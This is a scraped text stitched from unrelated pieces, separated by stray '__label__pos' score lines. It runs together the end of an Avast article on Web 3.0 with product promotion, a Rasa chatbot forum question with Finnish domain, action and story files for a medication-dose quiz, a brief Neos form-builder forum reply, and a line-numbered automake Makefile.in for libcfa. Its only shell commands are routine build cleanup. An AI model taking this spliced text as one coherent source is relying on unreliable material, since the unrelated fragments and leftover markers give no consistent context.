513 tardir=$(distdir) && $(am__tar) | BZIP2=$${BZIP2--9} bzip2 -c >$(distdir).tar.bz2
514 $(am__post_remove_distdir)
515
516dist-lzip: distdir
517 tardir=$(distdir) && $(am__tar) | lzip -c $${LZIP_OPT--9} >$(distdir).tar.lz
518 $(am__post_remove_distdir)
519
520dist-xz: distdir
521 tardir=$(distdir) && $(am__tar) | XZ_OPT=$${XZ_OPT--e} xz -c >$(distdir).tar.xz
522 $(am__post_remove_distdir)
523
524dist-tarZ: distdir
525 @echo WARNING: "Support for distribution archives compressed with" \
526 "legacy program 'compress' is deprecated." >&2
527 @echo WARNING: "It will be removed altogether in Automake 2.0" >&2
528 tardir=$(distdir) && $(am__tar) | compress -c >$(distdir).tar.Z
529 $(am__post_remove_distdir)
530
531dist-shar: distdir
532 @echo WARNING: "Support for shar distribution archives is" \
533 "deprecated." >&2
534 @echo WARNING: "It will be removed altogether in Automake 2.0" >&2
535 shar $(distdir) | GZIP=$(GZIP_ENV) gzip -c >$(distdir).shar.gz
536 $(am__post_remove_distdir)
537
538dist-zip: distdir
539 -rm -f $(distdir).zip
540 zip -rq $(distdir).zip $(distdir)
541 $(am__post_remove_distdir)
542
543dist dist-all:
544 $(MAKE) $(AM_MAKEFLAGS) $(DIST_TARGETS) am__post_remove_distdir='@:'
545 $(am__post_remove_distdir)
546
547# This target untars the dist file and tries a VPATH configuration. Then
548# it guarantees that the distribution is self-contained by making another
549# tarfile.
550distcheck: dist
551 case '$(DIST_ARCHIVES)' in \
552 *.tar.gz*) \
553 GZIP=$(GZIP_ENV) gzip -dc $(distdir).tar.gz | $(am__untar) ;;\
554 *.tar.bz2*) \
555 bzip2 -dc $(distdir).tar.bz2 | $(am__untar) ;;\
556 *.tar.lz*) \
557 lzip -dc $(distdir).tar.lz | $(am__untar) ;;\
558 *.tar.xz*) \
559 xz -dc $(distdir).tar.xz | $(am__untar) ;;\
560 *.tar.Z*) \
561 uncompress -c $(distdir).tar.Z | $(am__untar) ;;\
562 *.shar.gz*) \
563 GZIP=$(GZIP_ENV) gzip -dc $(distdir).shar.gz | unshar ;;\
564 *.zip*) \
565 unzip $(distdir).zip ;;\
566 esac
567 chmod -R a-w $(distdir)
568 chmod u+w $(distdir)
569 mkdir $(distdir)/_build $(distdir)/_build/sub $(distdir)/_inst
570 chmod a-w $(distdir)
571 test -d $(distdir)/_build || exit 0; \
572 dc_install_base=`$(am__cd) $(distdir)/_inst && pwd | sed -e 's,^[^:\\/]:[\\/],/,'` \
573 && dc_destdir="$${TMPDIR-/tmp}/am-dc-$$$$/" \
574 && am__cwd=`pwd` \
575 && $(am__cd) $(distdir)/_build/sub \
576 && ../../configure \
577 $(AM_DISTCHECK_CONFIGURE_FLAGS) \
578 $(DISTCHECK_CONFIGURE_FLAGS) \
579 --srcdir=../.. --prefix="$$dc_install_base" \
580 && $(MAKE) $(AM_MAKEFLAGS) \
581 && $(MAKE) $(AM_MAKEFLAGS) dvi \
582 && $(MAKE) $(AM_MAKEFLAGS) check \
583 && $(MAKE) $(AM_MAKEFLAGS) install \
584 && $(MAKE) $(AM_MAKEFLAGS) installcheck \
585 && $(MAKE) $(AM_MAKEFLAGS) uninstall \
586 && $(MAKE) $(AM_MAKEFLAGS) distuninstallcheck_dir="$$dc_install_base" \
587 distuninstallcheck \
588 && chmod -R a-w "$$dc_install_base" \
589 && ({ \
590 (cd ../.. && umask 077 && mkdir "$$dc_destdir") \
591 && $(MAKE) $(AM_MAKEFLAGS) DESTDIR="$$dc_destdir" install \
592 && $(MAKE) $(AM_MAKEFLAGS) DESTDIR="$$dc_destdir" uninstall \
593 && $(MAKE) $(AM_MAKEFLAGS) DESTDIR="$$dc_destdir" \
594 distuninstallcheck_dir="$$dc_destdir" distuninstallcheck; \
595 } || { rm -rf "$$dc_destdir"; exit 1; }) \
596 && rm -rf "$$dc_destdir" \
597 && $(MAKE) $(AM_MAKEFLAGS) dist \
598 && rm -rf $(DIST_ARCHIVES) \
599 && $(MAKE) $(AM_MAKEFLAGS) distcleancheck \
600 && cd "$$am__cwd" \
601 || exit 1
602 $(am__post_remove_distdir)
603 @(echo "$(distdir) archives ready for distribution: "; \
604 list='$(DIST_ARCHIVES)'; for i in $$list; do echo $$i; done) | \
605 sed -e 1h -e 1s/./=/g -e 1p -e 1x -e '$$p' -e '$$x'
606distuninstallcheck:
607 @test -n '$(distuninstallcheck_dir)' || { \
608 echo 'ERROR: trying to run $@ with an empty' \
609 '$$(distuninstallcheck_dir)' >&2; \
610 exit 1; \
611 }; \
612 $(am__cd) '$(distuninstallcheck_dir)' || { \
613 echo 'ERROR: cannot chdir into $(distuninstallcheck_dir)' >&2; \
614 exit 1; \
615 }; \
616 test `$(am__distuninstallcheck_listfiles) | wc -l` -eq 0 \
617 || { echo "ERROR: files left after uninstall:" ; \
618 if test -n "$(DESTDIR)"; then \
619 echo " (check DESTDIR support)"; \
620 fi ; \
621 $(distuninstallcheck_listfiles) ; \
622 exit 1; } >&2
623distcleancheck: distclean
624 @if test '$(srcdir)' = . ; then \
625 echo "ERROR: distcleancheck can only run from a VPATH build" ; \
626 exit 1 ; \
627 fi
628 @test `$(distcleancheck_listfiles) | wc -l` -eq 0 \
629 || { echo "ERROR: files left in build directory after distclean:" ; \
630 $(distcleancheck_listfiles) ; \
631 exit 1; } >&2
632check-am: all-am
633check: check-recursive
634all-am: Makefile
635installdirs: installdirs-recursive
636installdirs-am:
637install: install-recursive
638install-exec: install-exec-recursive
639install-data: install-data-recursive
640uninstall: uninstall-recursive
641
642install-am: all-am
643 @$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am
644
645installcheck: installcheck-recursive
646install-strip:
647 if test -z '$(STRIP)'; then \
648 $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \
649 install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \
650 install; \
651 else \
652 $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \
653 install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \
654 "INSTALL_PROGRAM_ENV=STRIPPROG='$(STRIP)'" install; \
655 fi
656mostlyclean-generic:
657
658clean-generic:
659
660distclean-generic:
661 -test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES)
662 -test . = "$(srcdir)" || test -z "$(CONFIG_CLEAN_VPATH_FILES)" || rm -f $(CONFIG_CLEAN_VPATH_FILES)
663
664maintainer-clean-generic:
665 @echo "This command is intended for maintainers to use"
666 @echo "it deletes files that may require special tools to rebuild."
667clean: clean-recursive
668
669clean-am: clean-generic mostlyclean-am
670
671distclean: distclean-recursive
672 -rm -f $(am__CONFIG_DISTCLEAN_FILES)
673 -rm -f Makefile
674distclean-am: clean-am distclean-generic distclean-tags
675
676dvi: dvi-recursive
677
678dvi-am:
679
680html: html-recursive
681
682html-am:
683
684info: info-recursive
685
686info-am:
687
688install-data-am:
689
690install-dvi: install-dvi-recursive
691
692install-dvi-am:
693
694install-exec-am:
695
696install-html: install-html-recursive
697
698install-html-am:
699
700install-info: install-info-recursive
701
702install-info-am:
703
704install-man:
705
706install-pdf: install-pdf-recursive
707
708install-pdf-am:
709
710install-ps: install-ps-recursive
711
712install-ps-am:
713
714installcheck-am:
715
716maintainer-clean: maintainer-clean-recursive
717 -rm -f $(am__CONFIG_DISTCLEAN_FILES)
718 -rm -rf $(top_srcdir)/autom4te.cache
719 -rm -f Makefile
720maintainer-clean-am: distclean-am maintainer-clean-generic
721
722mostlyclean: mostlyclean-recursive
723
724mostlyclean-am: mostlyclean-generic
725
726pdf: pdf-recursive
727
728pdf-am:
729
730ps: ps-recursive
731
732ps-am:
733
734uninstall-am:
735
736.MAKE: $(am__recursive_targets) install-am install-strip
737
738.PHONY: $(am__recursive_targets) CTAGS GTAGS TAGS all all-am \
739 am--refresh check check-am clean clean-cscope clean-generic \
740 cscope cscopelist-am ctags ctags-am dist dist-all dist-bzip2 \
741 dist-gzip dist-lzip dist-shar dist-tarZ dist-xz dist-zip \
742 distcheck distclean distclean-generic distclean-tags \
743 distcleancheck distdir distuninstallcheck dvi dvi-am html \
744 html-am info info-am install install-am install-data \
745 install-data-am install-dvi install-dvi-am install-exec \
746 install-exec-am install-html install-html-am install-info \
747 install-info-am install-man install-pdf install-pdf-am \
748 install-ps install-ps-am install-strip installcheck \
749 installcheck-am installdirs installdirs-am maintainer-clean \
750 maintainer-clean-generic mostlyclean mostlyclean-generic pdf \
751 pdf-am ps ps-am tags tags-am uninstall uninstall-am
752
753.PRECIOUS: Makefile
754
755
756# Tell versions [3.59,3.63) of GNU make to not export all variables.
757# Otherwise a system limit (for SysV at least) may be exceeded.
758.NOEXPORT:
Note: See TracBrowser for help on using the repository browser.
|
__label__pos
| 0.76666 |
Aymen on 01/5/2017
If you want to learn VueJS/Angular/React/Node, Just contact me.
What is Reactive programming ?
Reactive programming is learning to program completely around synchronous data streams
So what the deference between Imperative programming and Reactive programming ?
Imperative programming focuses on the order in witch computer does things, Reactive programming only care about order in witch thing need to happen, they are written ignorant of the time and context in witch they are run.
If you are a Front-end developer, you probably already wrote a reactive code without even realizing it, YES, DOM events like key-press wait for stream of input data and respond accordingly .
Reactive programming is completely different from the sequential work flow. They react when something is done.
Let’s take an example from Rx(Reactive-Extensions) :
The combineLatest operator combine the latest expression is used to synchronize 2 Observable streams into single Observable stream.
The Combine Latest doesn’t using queue, as it name suggest it only remember the latest value of each stream.
reactive-programming
We can see that when the y stream observed the b value, the result stream combine it with the latest value observed on x stream (3) and latter the same value will be combine into the result stream when the x stream will observed the 4 value.
The Combine Latest processing will come to end either when one of the stream
will complete or throw exception, in this case y Stream run complete(onComplete before RxJS5)
Did you feel lost ?
I felt the same thing the first time i read about reactive programming and RxJS, the hardest part of the learning journey is thinking in Reactive. It’s a lot about letting go of old imperative and stateful habits of typical programming, and forcing your brain to work in a different paradigm.
What about you? it worth learning nowadays ?
If you have any corrections you can pull a request on GitHub : What is Reactive programming ? on GitHub
This may be interesting for you
No comments yet.
Write a comment:
|
__label__pos
| 0.985465 |
For questions regarding elliptic curves. Questions on ellipses should be tagged [conic-sections] instead.
learn more… | top users | synonyms
7
votes
2answers
1k views
Local-Global Principle and the Cassels statement.
In a recent article I have read, i.e. " Lecture notes on elliptic curves ", Prof.Cassels remarks in page-110 that There is not merely a local-global principle for curves of genus-$0$, but ...
26
votes
1answer
1k views
Does an elementary solution exist to $x^2+1=y^3$?
Prove that there are no positive integer solutions to $$x^2+1=y^3$$ This problem is easy if you apply Catalans conjecture and still doable talking about Gaussian integers and UFD's. However, can this ...
6
votes
3answers
2k views
Group Law for an Elliptic curve
I was reading this book "Rational points on Elliptic curves" by J.Silverman, and J.Tate, 2 prominent figures in Number theory and was very intrigued after reading the first couple of pages. The ...
5
votes
3answers
2k views
Integral points on an elliptic curve
Let's start with an elliptic curve in the form $$E : y^2 = x^3 + Ax + B, \qquad A, B \in \mathbb{Z}.$$ I am wondering about integral points. I know that Siegel proved that $E$ has only finitely many ...
27
votes
1answer
3k views
How to compute rational or integer points on elliptic curves
This is an attempt to get someone to write a canonical answer, as discussed in this meta thread. We often have people come to us asking for solutions to a diophantine equation which, after some clever ...
17
votes
2answers
4k views
Elliptic Curves and Points at Infinity
My undergraduate number theory class decided to dip into a bit of algebraic geometry to finish up the semester. I'm having trouble understanding this bit of information that the instructor presented ...
17
votes
1answer
624 views
More elliptic curves for $x^4+y^4+z^4 = 1$?
(Note: This has been updated to be similar with this MO post.) There are exactly 22 known primitive solutions to, $$a^4+b^4+c^4 = d^4\tag{1}$$ with $d<10^{11}$. Noam Elkies showed that $(1)$ as, ...
3
votes
2answers
421 views
Calculating the divisors of the coordinate functions on an elliptic curve
I am currently reading Silverman's arithmetic of elliptic curves. In chapter II, reviewing divisor, there is an explicit calculation: Given $y^2 = (x-e_1)(x-e_2)(x-e_3)$ let $P_i = (e_i,0),$ and $ ...
5
votes
1answer
218 views
Cube of an integer
$\frac{x}{y}+\frac{y}{z}+\frac{z}{x}=k$ and $x, y, z, k$ are integers. Prove that $xyz$ is cube of some integer number. I was wondering about giving a parametrization for the rational points on ...
9
votes
2answers
376 views
Making an elliptic curve out of a cubic polynomial made a cube, or $ax^3+bx^2+cx+d = y^3$
What is the transformation such that a general cubic polynomial to be made a cube, $$ax^3+bx^2+cx+d = y^3\tag{1}$$ can be transformed to Weierstrass form, $$x^3+Ax+B = t^2\tag{2}$$ (The special ...
5
votes
1answer
640 views
Intuition and Stumbling blocks in proving the finiteness of WC group
After reading many articles about the Tate-Shafarevich Group ,i understood that "in naive perspective the group is nothing but the measure of the failure of Hasse principle, and coming to its ...
4
votes
1answer
84 views
How I can express $(x,y)∈G$ by using the $r$ independent points $P_1,P_2,\ldots,P_r$
Let $C$ be an elliptic curve over $ℚ$. The group $C(ℚ)$ is a finitely generated Abelian group and we have $C(ℚ)≃ℤ^{r}⊕C(ℚ)^\mathrm{tors}$, where $C(ℚ)^\mathrm{tors}$ is a finite abelian group (is the ...
2
votes
1answer
117 views
Finding order of a point on eliptic curve
Just started studying eliptic curves and am having trouble with this question. An explanation/solution would be much appreciated. Find the order of the point X on the elliptic curve $E/Q$ for the ...
11
votes
2answers
1k views
The modular curve X(N)
I have a question about the modular curve X(N), which classifies elliptic curves with full level N structure. (A level N structure of an elliptic curve E is an isomorphism from $Z/NZ \times Z/NZ$ to ...
8
votes
1answer
149 views
Why does the elliptic curve for $a+b+c = abc = 6$ involve a solvable nonic?
The curve discussed in this OP's post, $$\color{brown}{-24a+36a^2-12a^3+a^4}=z^2\tag1$$ is birationally equivalent to an elliptic curve. Following E. Delanoy's post, let $G$ be the set of rational ...
6
votes
1answer
144 views
Rational map of a curve to an elliptic curve
If I have a curve given by $$ y^2 = (x^3-1)(x^3-a), $$ how do I find out if there is a rational variable transformation $y=y(s,t)$, $x=x(s,t)$ that maps this curve onto an elliptic curve of the form ...
3
votes
1answer
226 views
How could we show that the abelian group has $\text{ rank}=0$?
Let $E/\mathbb{Q}$ the elliptic curve $Y^2=X^3+p^2X$ with $p \equiv 5 \pmod 8$. Show that the abelian group $E(\mathbb{Q})$ has $\text{rank}=0$. Could you give me a hint how we could do this? It is ...
3
votes
1answer
295 views
Modular functions and elliptic functions
Does anybody know of an equation formally equating modular functions and elliptic functions similar to Euler's equation for exponential and trigonometric functions? Any advice much appreciated. ...
10
votes
3answers
967 views
Can you recommend some books on elliptic function?
I plan to study elliptic function. Can you recommend some books? What is the relationship between elliptic function and elliptic curve?Many thanks in advance!
6
votes
1answer
265 views
UPDATE: How to find the order of elliptic curve over finite field extension
I want to find the order of elliptic curve over the finite field extension $\mathbb{F}_{p^2}$, where $E(\mathbb{F}_{p^2}):y^2=x^3+ax+b $ I am using the method illustrated by John J. McGee in his ...
4
votes
1answer
853 views
How to find all rational points on the elliptic curves like $y^2=x^3-2$
Reading the book by Diophantus, one may be led to consider the curves like: $y^2=x^3+1$, $y^2=x^3-1$, $y^2=x^3-2$, the first two of which are easy (after calculating some eight curves to be solved ...
3
votes
1answer
79 views
How to obtaining the lattice corresponding to an elliptic curve
Let $C$ be a complex elliptic curve given by the quation $y^2=4x^3-g_2 x -g_3$. How do I find the lattice $\Lambda$ such that $C \cong \mathbb{C}/\Lambda$? I need the lattice (and corresponding ...
2
votes
1answer
209 views
Looking for help with this elementary method of finding integer solutions on an elliptic curve.
In the post Finding all solutions to $y^3 = x^2 + x + 1$ with $x,y$ integers larger than $1$, the single positive integer solution $(x,y)=(18,7)$ is found using algebraic integers. In one of the ...
2
votes
1answer
43 views
What is the argument used to dsitinguish the cases (a) and (b)
We know from [B. Mazur, Modular curves and the Eisenstein ideal, Publ. math. IHES 47 (1977), 33-186] that if $C$ is an elliptic curve of the form ($C:y²=x³+ax+b$ with $a,b∈ℤ$), then $C(ℚ)^{tors}$ (the ...
2
votes
1answer
222 views
Proving the condition for two elliptic curves given in Weierstrass form to be isomorphic
I'm taking a course on elliptic curves and trying to understand the proof of Proposition 3.2. Let $E$, $E'$ be elliptic curves over $K$ in Weierstrass form: ...
4
votes
2answers
180 views
The group $E(\mathbb{F}_p)$ has exactly $p+1$ elements
Let $E/\mathbb{F}_p$ the elliptic curve $y^2=x^3+Ax$. We suppose that $p \geq 7$ and $p \equiv 3 \pmod {4}$. I want to show that the group $E(\mathbb{F}_p)$ has exactly $p+1$ elements. I was ...
3
votes
1answer
68 views
Commutativity of “extension” and “taking the radical” of ideals
Let $K$ be a field (not necessarily algebraically closed) and $\overline{K}$ its algebraic closure. By $K[\text{X}]$, I mean $K[X_1,...,X_n]$. Is it true that the operations of "extension" and ...
3
votes
1answer
60 views
Multiplication by $m$ isogenies of elliptic curves in characteristic $p$
I've been attempting to prove some comments I've read on MO by myself for my undergrad thesis regarding étale morphisms of elliptic curves. My definition of an étale morphism is taken from Milne's ...
3
votes
1answer
120 views
Finding two non-congruent right-angle triangles
The map $g: B \to A, \ (x,y) \mapsto \left(\dfrac {x^2 - 25} y, \dfrac {10x} y, \dfrac {x^2 + 25} y \right)$ is a bijection where $A = \{ (a,b,c) \in \Bbb Q ^3 : a^2 + b^2 = c^2, \ ab = 10 \}$ and $B ...
2
votes
2answers
119 views
Reason behind standard names of coefficients in long Weierstrass equation
A long Weierstrass equation is an equation of the form $$y^2+a_1xy+a_3y=x^3+a_2x^2+a_4x+a_6$$ Why are the coefficients named $a_1, a_2, a_3, a_4$ and $a_6$ in this manner, corresponding to $xy, x^2, ...
2
votes
1answer
107 views
Number of points on $Y^2 = X^3 + A$ over $\mathbb{F}_p$
Let $p\equiv 2\pmod{3}$ be prime and let $A\in\mathbb{F}^{∗}_p$ . Show that the number of points (including the point at infinity) on the curve $Y^2 = X^ 3 + A$ over $\mathbb{F}_ p$ is exactly $p + 1$ ...
1
vote
0answers
53 views
Is it possible to say that every point $P$ in $C(ℚ)$ other than the 'basis' is of finite order?
Let $C$ an elliptic curve over $\mathbb Q$. Assume that the rank of $C(ℚ)$ is equal to $r$. Then the cardinality of a maximal independent set in $C(ℚ)$ is $r$, thus there exists $r$ independent points ...
1
vote
1answer
94 views
Violating assertion in Cohen's instructions for Weierstrass reduction
I am trying to follow case 2 of the procedure given in Cohen: for the cubic $f(x,y,z) = x^3 + 3 y^3 - 11 z^3$ using the rational point $P_0 = (2 : 1 : 1)$. The tangent at this point is $y = - ...
0
votes
0answers
69 views
Can we extend the map $φ$ to $ℝ^{r}×C(ℚ)^{\text{tors}}→C(ℚ)$ as an isomorphism or not?
The motivation to this question can be found in How I can express $(x,y)∈G$ by using the $r$ independent points $P_1,P_2,\ldots,P_r$ We know that there is an isomorphism ...
35
votes
3answers
840 views
The resemblance between Mordell's theorem and Dirichlet's unit theorem
The first one states that if $E/\mathbf Q$ is an elliptic curve, then $E(\mathbf Q)$ is a finitely generated abelian group. If $K/\mathbf Q$ is a number field, Dirichlet's theorem says (among other ...
23
votes
3answers
758 views
Find integer in the form: $\frac{a}{b+c} + \frac{b}{c+a} + \frac{c}{a+b}$
Let $a,b,c \in \mathbb N$ find integer in the form: $$I=\frac{a}{b+c} + \frac{b}{c+a} + \frac{c} {a+b}$$ Using Nesbitt's inequality: $I \ge \frac 32$ I am trying to prove $I \le 2$ to implies ...
11
votes
2answers
177 views
Diophantine equation $x^2 + xy + y^2 = \left({{x+y}\over{3}} + 1\right)^3$.
Solve in integers the equation$$x^2 + xy + y^2 = \left({{x+y}\over3} + 1\right)^3.$$
13
votes
2answers
842 views
How are the Tate-Shafarevich group and class group supposed to be cognates?
How can one consider the Tate-Shafarevich group and class group of a field to be analogues? I have heard many authors and even many expository papers saying so, class group as far as I know is ...
8
votes
1answer
2k views
Reading the mind of Prof. John Coates (motive behind his statement)
To start with the issue, I have been thinking from many days that Birch-Swinnerton-dyer conjectures should have some association with the Galois theory, but one day I got the Article of Tate called as ...
13
votes
1answer
2k views
Explicit Derivation of Weierstrass Normal Form for Cubic Curve
In page 22-23 of Rational Points on Elliptic Curves by Silverman and Tate, authors explain why is it possible to put every cubic curve into Weierstrass Normal Form. Here are relevant pages: (My ...
11
votes
2answers
764 views
Is the real locus of an elliptic curve the intersection of a torus with a plane?
In Lawrence Washington's book Elliptic Curves: Number Theory and Criptography I read that if $E$ is an elliptic curve defined over the real numbers $\mathbb{R}$ then the set of real points ...
3
votes
1answer
114 views
rational points on particular elliptic curve
I do have a few books that discuss elliptic curves, however... What are the rational points on $$ y^2 = 4 x^3 - 4 x = 4 x(x-1)(x+1)? $$ I think it ought to be $(-1,0), (0,0), (1,0).$ Maybe it's ...
8
votes
2answers
267 views
Integer solutions of $x^3 = 7y^3 + 6 y^2+2 y$?
Does the equation $$x^3 = 7y^3 + 6 y^2+2 y\tag{1}$$ have any positive integer solutions? This is equivalent to a conjecture about OEIS sequence A245624. Maple tells me this is a curve of genus $1$, ...
8
votes
3answers
1k views
References for elliptic curves
I just finished reading Silverman and Tate's Rational Points on Elliptic Curves and thought it was very interesting. Could any of you point me to some more references (ex. books, articles) on ...
6
votes
1answer
107 views
5
votes
0answers
191 views
What is stopping every Mordell equation from having a [truly] elementary proof?
The Mordell equation is the Diophantine equation $$Y^2 = X^3-k \tag{1}$$ where $k$ is a given integer. There is no known single method — elementary or otherwise — to solve equation $(1)$ for all $k$, ...
10
votes
3answers
577 views
Integer solutions for $x^3+2=y^2$?
I've heard a famous result that $26$ is the only integer, such that $26-1=25$ is a square number and $26+1=27$ is a cubic number.In other words, $(x,y)=(5,3)$ is the only solution for $x^2+2=y^3$. ...
9
votes
2answers
114 views
order of an elliptic curve
I have found that the curve given by $x^3+x+1=y^2$ over $\mathbb{F_5}$ has 9 points. Now I am supposed to find the number of points of the same curve on $\mathbb{F}_{125}$. Using Hasse and the fact ...
5
votes
1answer
755 views
How do I show that this curve has a nonsingular model of genus 1?
Let $C$ be the projective closure of $Z(f) \subset \mathbf{A}^2$ where $f$ is an irreducible polynomial of degree 4 in $x$ and degree 2 in $y$, so $C = Z(f^*) \subset \mathbf{P}^2$ where $f^*$ is the ...
4
votes
2answers
442 views
On the relationship between Fermats Last Theorem and Elliptic Curves
I have to give a presentation on elliptic curves in general. It does not have to be very in depth. I have a very basic understanding of elliptic curves (The most I understand is the concept of ranks). ...
|
__label__pos
| 0.994216 |
Gulp脚本
如何下载、配置,这里我给出一个我跟着来的教程Hexo使用Gulp压缩静态资源,2操作是必须的,3操作我使用了,4-5我并没有参考
这里着重说明一下,关于脚本执行顺序,以及精简代码
脚本执行顺序
// 执行顺序: 清除public目录 -> 产生原始博客内容 -> 执行压缩混淆 -> 部署到服务器
gulp.task(
"default",
gulp.series(
"clean",
"generate",
"compressHtml",
"compressCss",
"compressJs",
gulp.parallel("deploy")
)
);
• 先是clean,清除已经创建的public文件夹
• 之后是生成页面
• 接下来分别是压缩HTML文件、CSS文件、JS文件
• 最后是将本地部署到GitHubPage仓库当中去
精简代码
原本我们需要hexo clean -> hexo g -> hexo d三个命令才能完成部署上去这个任务,不过在gulp中,我们可以自定义task,也就是上面给出的代码,不仅能自定义顺序,还能自定义这个任务触发的命令,比如这里我使用默认的default设置,当设置为default的时候,我们只需要在终端中,输入gulp,就可以直接开始上面提到的脚本执行顺序,这样可以使得一个命令,集成多步操作,稍微“偷懒”一下
代码提供
先在hexo目录下创建gulpfile.js文件
如果本来就有这个文件,直接打开,把里面的代码替换成下面我提供的就行了
var gulp = require("gulp");
var debug = require("gulp-debug");
var cleancss = require("gulp-clean-css"); //css压缩组件
var uglify = require("gulp-uglify"); //js压缩组件
var htmlmin = require("gulp-htmlmin"); //html压缩组件
var htmlclean = require("gulp-htmlclean"); //html清理组件
var changed = require("gulp-changed"); //文件更改校验组件
var gulpif = require("gulp-if"); //任务 帮助调用组件
var plumber = require("gulp-plumber"); //容错组件(发生错误不跳出任务,并报出错误内容)
var isScriptAll = true; //是否处理所有文件,(true|处理所有文件)(false|只处理有更改的文件)
var isDebug = true; //是否调试显示 编译通过的文件
var gulpBabel = require("gulp-babel");
var es2015Preset = require("babel-preset-es2015");
var del = require("del");
var Hexo = require("hexo");
var hexo = new Hexo(process.cwd(), {}); // 初始化一个hexo对象
// 清除public文件夹
gulp.task("clean", function () {
return del(["public/**/*"]);
});
// 下面几个跟hexo有关的操作,主要通过hexo.call()去执行,注意return
// 创建静态页面 (等同 hexo generate)
gulp.task("generate", function () {
return hexo.init().then(function () {
return hexo
.call("generate", {
watch: false
})
.then(function () {
return hexo.exit();
})
.catch(function (err) {
return hexo.exit(err);
});
});
});
// 启动Hexo服务器
gulp.task("server", function () {
return hexo
.init()
.then(function () {
return hexo.call("server", {});
})
.catch(function (err) {
console.log(err);
});
});
// 部署到服务器
gulp.task("deploy", function () {
return hexo.init().then(function () {
return hexo
.call("deploy", {
watch: false
})
.then(function () {
return hexo.exit();
})
.catch(function (err) {
return hexo.exit(err);
});
});
});
// 压缩public目录下的js文件
gulp.task("compressJs", function () {
return gulp
.src(["./public/js/*.js", "!./public/js/utils.js"]) //排除的js
.pipe(gulpif(!isScriptAll, changed("./public")))
.pipe(gulpif(isDebug, debug({ title: "Compress JS:" })))
.pipe(plumber())
.pipe(
gulpBabel({
presets: [es2015Preset] // es5检查机制
})
)
.pipe(uglify()) //调用压缩组件方法uglify(),对合并的文件进行压缩
.pipe(gulp.dest("./public")); //输出到目标目录
});
// 压缩public目录下的css文件
gulp.task("compressCss", function () {
var option = {
rebase: false,
//advanced: true, //类型:Boolean 默认:true [是否开启高级优化(合并选择器等)]
compatibility: "ie7" //保留ie7及以下兼容写法 类型:String 默认:''or'*' [启用兼容模式; 'ie7':IE7兼容模式,'ie8':IE8兼容模式,'*':IE9+兼容模式]
//keepBreaks: true, //类型:Boolean 默认:false [是否保留换行]
//keepSpecialComments: '*' //保留所有特殊前缀 当你用autoprefixer生成的浏览器前缀,如果不加这个参数,有可能将会删除你的部分前缀
};
return gulp
.src(["./public/**/*.css", "!./public/**/*.min.css"]) //排除的css
.pipe(gulpif(!isScriptAll, changed("./public")))
.pipe(gulpif(isDebug, debug({ title: "Compress CSS:" })))
.pipe(plumber())
.pipe(cleancss(option))
.pipe(gulp.dest("./public"));
});
// 压缩public目录下的html文件
gulp.task("compressHtml", function () {
var cleanOptions = {
protect: /<\!--%fooTemplate\b.*?%-->/g, //忽略处理
unprotect: /<script [^>]*\btype="text\/x-handlebars-template"[\s\S]+?<\/script>/gi //特殊处理
};
var minOption = {
collapseWhitespace: true, //压缩HTML
collapseBooleanAttributes: true, //省略布尔属性的值 <input checked="true"/> ==> <input />
removeEmptyAttributes: true, //删除所有空格作属性值 <input id="" /> ==> <input />
removeScriptTypeAttributes: true, //删除<script>的type="text/javascript"
removeStyleLinkTypeAttributes: true, //删除<style>和<link>的type="text/css"
removeComments: true, //清除HTML注释
minifyJS: true, //压缩页面JS
minifyCSS: true, //压缩页面CSS
minifyURLs: true //替换页面URL
};
return gulp
.src("./public/**/*.html")
.pipe(gulpif(isDebug, debug({ title: "Compress HTML:" })))
.pipe(plumber())
.pipe(htmlclean(cleanOptions))
.pipe(htmlmin(minOption))
.pipe(gulp.dest("./public"));
});
// 执行顺序: 清除public目录 -> 产生原始博客内容 -> 执行压缩混淆 -> 部署到服务器
gulp.task(
"default",
gulp.series(
"clean",
"generate",
"compressHtml",
"compressCss",
"compressJs",
gulp.parallel("deploy")
)
);
//Gulp4最大的一个改变就是gulp.task函数现在只支持两个参数,分别是任务名和运行任务的函数
MathJax数学公式重复
关于这个问题,我找了几个教程,但都不怎么对,这里我先提供一个,相对完整的教程这次彻底解决在Hexo中渲染MathJax数学公式出现的问题!!!
先跟着上面的教程来设置,基本都是对的,然后还要删除一个文件
这里我贴一下知乎上的操作
在删除这个文件之后,渲染问题才能彻底解决,这个文件可能后面没有-plus,不过没有影响,不带-plus也可以删除
|
__label__pos
| 0.820214 |
Drago Drago - 10 months ago 63
CSS Question
Make content of navbar fit when the screen is between 768px and 992px
Whenever I resize my browser the content of the navbar gets pushed to a newline. This only happens between 768px and 992px. Is there a way that I can make the content of the navbar fit my screen?
This is what happens when the screen is between 768px and 992px:
http://image.prntscr.com/image/93ddcadd374d4af9928e3be209645ab3.png
HTML:
<nav class="navbar navbar-default navbar-fixed-top">
<div class="container">
<!-- Brand and toggle get grouped for better mobile display -->
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse"
data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
</button>
<a class="navbar-brand" href="/">Logo</a>
</div>
<!-- Collect the nav links, forms, and other content for toggling -->
<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
<ul class="nav navbar-nav">
<!-- <li class="active"><a href="#">Main <span class="sr-only">(current)</span></a></li> -->
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true"
aria-expanded="false">dropdown 1<span
class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="/news">1</a></li>
<li><a href="/staff"> 2</a></li>
<li><a href="/status">3</a></li>
<li><a href="/about">4</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true"
aria-expanded="false">dropdown 2<span
class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="https://kiwiirc.com/client/irc.lunarirc.net:+6697/?nick=lunar%7C?#LunarIRC" target="_blank">1</a></li>
<li><a href="irc://irc.lunarirc.net:6697"> 2</a></li>
</ul>
</li>
<li class="dropdown">
